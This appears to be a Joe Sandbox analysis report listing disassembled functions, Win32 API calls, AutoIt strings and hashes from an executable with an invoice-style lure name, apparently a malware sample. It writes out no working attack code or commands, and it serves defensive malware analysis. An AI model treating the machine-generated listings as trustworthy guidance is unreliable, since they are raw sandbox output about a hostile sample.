                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A979B9
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00A979C9
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A979D2
                                                        • DeleteDC.GDI32(00000000), ref: 00A979DB
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A97A07
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A97A1E
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00A97A59
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A97A6D
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A97A7E
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00A97AAE
                                                        • GetStockObject.GDI32(00000011), ref: 00A97AB9
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A97AC4
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00A97ACE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-2771358697
                                                        • Opcode ID: f1687cddd5dfae84930962f7a60533a1717628b355a5490b2a0da422320f28ec
                                                        • Instruction ID: 76519cce645a27fed47a2fdbc0608e3fa5c7329d595354753a9775267113c368
                                                        • Opcode Fuzzy Hash: f1687cddd5dfae84930962f7a60533a1717628b355a5490b2a0da422320f28ec
                                                        • Instruction Fuzzy Hash: 93A15F71A40215BFEB14DBE8DD4AFAE7BB9EB49710F008514FA15AB2E0D770AD01CB64
                                                        Function 00AAAB60 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 201windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 00AAAB99
                                                        • SetTextColor.GDI32(?,?), ref: 00AAAB9D
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AAABB3
                                                        • GetSysColor.USER32(0000000F), ref: 00AAABBE
                                                        • CreateSolidBrush.GDI32(?), ref: 00AAABC3
                                                        • GetSysColor.USER32(00000011), ref: 00AAABDB
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AAABE9
                                                        • SelectObject.GDI32(?,00000000), ref: 00AAABFA
                                                        • SetBkColor.GDI32(?,00000000), ref: 00AAAC03
                                                        • SelectObject.GDI32(?,?), ref: 00AAAC10
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00AAAC2F
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AAAC46
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00AAAC5B
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AAACA7
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AAACCE
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00AAACEC
                                                        • DrawFocusRect.USER32(?,?), ref: 00AAACF7
                                                        • GetSysColor.USER32(00000011), ref: 00AAAD05
                                                        • SetTextColor.GDI32(?,00000000), ref: 00AAAD0D
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00AAAD21
                                                        • SelectObject.GDI32(?,00AAA869), ref: 00AAAD38
                                                        • DeleteObject.GDI32(?), ref: 00AAAD43
                                                        • SelectObject.GDI32(?,?), ref: 00AAAD49
                                                        • DeleteObject.GDI32(?), ref: 00AAAD4E
                                                        • SetTextColor.GDI32(?,?), ref: 00AAAD54
                                                        • SetBkColor.GDI32(?,?), ref: 00AAAD5E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID: @U=u
                                                        • API String ID: 1996641542-2594219639
                                                        • Opcode ID: 61d0bb164bf414e7c72fe550f15be63ab4f8f4aff491f029c35a2a39f3a33718
                                                        • Instruction ID: 1d38859f572933a1476887dd8d96209b09120eca8a9de7219532579d7e2201cb
                                                        • Opcode Fuzzy Hash: 61d0bb164bf414e7c72fe550f15be63ab4f8f4aff491f029c35a2a39f3a33718
                                                        • Instruction Fuzzy Hash: 1E616D71900219EFDB15DFE4DC48EAE7BB9EB0A320F108225FA15AB2E1D7719D41DB90
                                                        Function 00A8AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A8AF89
                                                        • GetDriveTypeW.KERNEL32(?,00AAFAC0,?,\\.\,00AAF910), ref: 00A8B066
                                                        • SetErrorMode.KERNEL32(00000000,00AAFAC0,?,\\.\,00AAF910), ref: 00A8B1C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 46cf36197b3a2505c426ac868b0cb86cb09678d769eb4cf36f5b03305c7c227c
                                                        • Instruction ID: deaddf5c000d58f0bb6df0b16e0c01d96bb8e75127a3f96f2c6d63f9d0cfb2c2
                                                        • Opcode Fuzzy Hash: 46cf36197b3a2505c426ac868b0cb86cb09678d769eb4cf36f5b03305c7c227c
                                                        • Instruction Fuzzy Hash: 9D51A130694305FFCB04FB64CA969BD73B0BB24741B604A26E41BEB291C7759D41DB62
                                                        Function 00A26A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: 3859eea1d5c4bae69c8f687e1a401a93c647e1e4f9d764e5aec4968d2d595f05
                                                        • Instruction ID: 043fb15131fa5125470d89f436aa77812a82fca7f0bd08d12f8ed4b68de08f02
                                                        • Opcode Fuzzy Hash: 3859eea1d5c4bae69c8f687e1a401a93c647e1e4f9d764e5aec4968d2d595f05
                                                        • Instruction Fuzzy Hash: B9811971641225BACF24AF68EE92FAE7778BF15340F044035FD41AB182EB71DB49C251
                                                        Function 00AA8C44 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AA8D34
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AA8D45
                                                        • CharNextW.USER32(0000014E), ref: 00AA8D74
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AA8DB5
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AA8DCB
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AA8DDC
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00AA8DF9
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00AA8E45
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00AA8E5B
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA8E8C
                                                        • _memset.LIBCMT ref: 00AA8EB1
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00AA8EFA
                                                        • _memset.LIBCMT ref: 00AA8F59
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AA8F83
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AA8FDB
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00AA9088
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00AA90AA
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AA90F4
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AA9121
                                                        • DrawMenuBar.USER32(?), ref: 00AA9130
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00AA9158
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0$@U=u
                                                        • API String ID: 1073566785-975001249
                                                        • Opcode ID: b8be40f37c19cd2fe8ea5d9c4fce2d0614425ba3683b467eac6c4ac92ff08156
                                                        • Instruction ID: d38c4ffb5c84e8bad8765f3a610b9eb07affadf06269f6bde0802324e6568f5b
                                                        • Opcode Fuzzy Hash: b8be40f37c19cd2fe8ea5d9c4fce2d0614425ba3683b467eac6c4ac92ff08156
                                                        • Instruction Fuzzy Hash: 22E16E74900219AEDF20DFA4CC88AEE7BB9EF06710F148159F915AB2D1DB748A85DF60
                                                        Function 00AA4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00AA4C51
                                                        • GetDesktopWindow.USER32 ref: 00AA4C66
                                                        • GetWindowRect.USER32(00000000), ref: 00AA4C6D
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AA4CCF
                                                        • DestroyWindow.USER32(?), ref: 00AA4CFB
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AA4D24
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AA4D42
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00AA4D68
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00AA4D7D
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00AA4D90
                                                        • IsWindowVisible.USER32(?), ref: 00AA4DB0
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00AA4DCB
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00AA4DDF
                                                        • GetWindowRect.USER32(?,?), ref: 00AA4DF7
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00AA4E1D
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00AA4E37
                                                        • CopyRect.USER32(?,?), ref: 00AA4E4E
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00AA4EB9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 52c8792e7f7ed28d8fdd3d1da066ff6400c22b4d0a611c47e6048a341af5a7bd
                                                        • Instruction ID: cbb0e3c300aca44c5c67a9529aa82126bea5bd4edadd407591d5662ef9deab22
                                                        • Opcode Fuzzy Hash: 52c8792e7f7ed28d8fdd3d1da066ff6400c22b4d0a611c47e6048a341af5a7bd
                                                        • Instruction Fuzzy Hash: C1B18A71608351AFDB04DF68C944B6BBBE4BF8A710F00892CF5999B2A1D7B1EC05CB91
                                                        Function 00A846D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A846E8
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A8470E
                                                        • _wcscpy.LIBCMT ref: 00A8473C
                                                        • _wcscmp.LIBCMT ref: 00A84747
                                                        • _wcscat.LIBCMT ref: 00A8475D
                                                        • _wcsstr.LIBCMT ref: 00A84768
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A84784
                                                        • _wcscat.LIBCMT ref: 00A847CD
                                                        • _wcscat.LIBCMT ref: 00A847D4
                                                        • _wcsncpy.LIBCMT ref: 00A847FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 699586101-1459072770
                                                        • Opcode ID: 32f37b86f4bcaefc8c21a15a4af25b1f8a45f39eb7f0ff1ecd80b70595ba1110
                                                        • Instruction ID: dcd26fcb7653dcfe9ab9bd0270bf8a2c05c36b6607d94a2359f64d63c85315d2
                                                        • Opcode Fuzzy Hash: 32f37b86f4bcaefc8c21a15a4af25b1f8a45f39eb7f0ff1ecd80b70595ba1110
                                                        • Instruction Fuzzy Hash: 3141173AA00201BADB15B7B48D43FBF77BCEF86710F440066F905E6182EB70990197A5
                                                        Function 00A227D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A228BC
                                                        • GetSystemMetrics.USER32(00000007), ref: 00A228C4
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A228EF
                                                        • GetSystemMetrics.USER32(00000008), ref: 00A228F7
                                                        • GetSystemMetrics.USER32(00000004), ref: 00A2291C
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A22939
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A22949
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A2297C
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A22990
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00A229AE
                                                        • GetStockObject.GDI32(00000011), ref: 00A229CA
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A229D5
                                                          • Part of subcall function 00A22344: GetCursorPos.USER32(?), ref: 00A22357
                                                          • Part of subcall function 00A22344: ScreenToClient.USER32(00AE67B0,?), ref: 00A22374
                                                          • Part of subcall function 00A22344: GetAsyncKeyState.USER32(00000001), ref: 00A22399
                                                          • Part of subcall function 00A22344: GetAsyncKeyState.USER32(00000002), ref: 00A223A7
                                                        • SetTimer.USER32(00000000,00000000,00000028,00A21256), ref: 00A229FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: @U=u$AutoIt v3 GUI
                                                        • API String ID: 1458621304-2077007950
                                                        • Opcode ID: a2f829972808812c0fa7529d5a149385419b345060bd140c0d932668ff24c6cf
                                                        • Instruction ID: 652cc6d3f718ffc8738151550dda3272b15bb2ffb5ade1e0cba5eb1d0885506f
                                                        • Opcode Fuzzy Hash: a2f829972808812c0fa7529d5a149385419b345060bd140c0d932668ff24c6cf
                                                        • Instruction Fuzzy Hash: 46B16E71A0025AAFDB14DFA8DD85BAD7BB4FB18321F104629FA15AB2D0DB74D841CB50
                                                        Function 00A7C4C1 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 169windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadIconW.USER32(00000063), ref: 00A7C4D4
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A7C4E6
                                                        • SetWindowTextW.USER32(?,?), ref: 00A7C4FD
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00A7C512
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00A7C518
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A7C528
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00A7C52E
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A7C54F
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A7C569
                                                        • GetWindowRect.USER32(?,?), ref: 00A7C572
                                                        • SetWindowTextW.USER32(?,?), ref: 00A7C5DD
                                                        • GetDesktopWindow.USER32 ref: 00A7C5E3
                                                        • GetWindowRect.USER32(00000000), ref: 00A7C5EA
                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00A7C636
                                                        • GetClientRect.USER32(?,?), ref: 00A7C643
                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00A7C668
                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A7C693
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                        • String ID: @U=u
                                                        • API String ID: 3869813825-2594219639
                                                        • Opcode ID: 894842b468543e1b9573faa643f1fc48763b0da5b7448498e4bbbce6b1b57b3e
                                                        • Instruction ID: 4af735f54b6b3885b24d32a1b975c76b886f79417f300beb4ec590eda4745c81
                                                        • Opcode Fuzzy Hash: 894842b468543e1b9573faa643f1fc48763b0da5b7448498e4bbbce6b1b57b3e
                                                        • Instruction Fuzzy Hash: 0A515F71900709AFDB20DFA8DD89B6EBBF5FF04715F00852CE686A25A0D775A905CB50
                                                        Function 00AA4069 Relevance: 30.0, APIs: 3, Strings: 14, Instructions: 283windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00AA40F6
                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AA41B6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                        • API String ID: 3974292440-1753161424
                                                        • Opcode ID: d49219a3929043fb90c048e18b37181315f084350aeae4f67933d98f1ece471a
                                                        • Instruction ID: e37a44bc819586f8bc0cc343ae74aa6329baa24fb637e224adadb4a70a09b957
                                                        • Opcode Fuzzy Hash: d49219a3929043fb90c048e18b37181315f084350aeae4f67933d98f1ece471a
                                                        • Instruction Fuzzy Hash: CAA17E30214311DFCB14EF24DA52E6AB3A5BF89314F14896DB8969B3D2DB70ED0ACB51
                                                        Function 00A952F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00A95309
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00A95314
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00A9531F
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00A9532A
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00A95335
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00A95340
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00A9534B
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00A95356
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00A95361
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00A9536C
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00A95377
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00A95382
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00A9538D
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00A95398
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00A953A3
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00A953AE
                                                        • GetCursorInfo.USER32(?), ref: 00A953BE
                                                        • GetLastError.KERNEL32(00000001,00000000), ref: 00A953E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
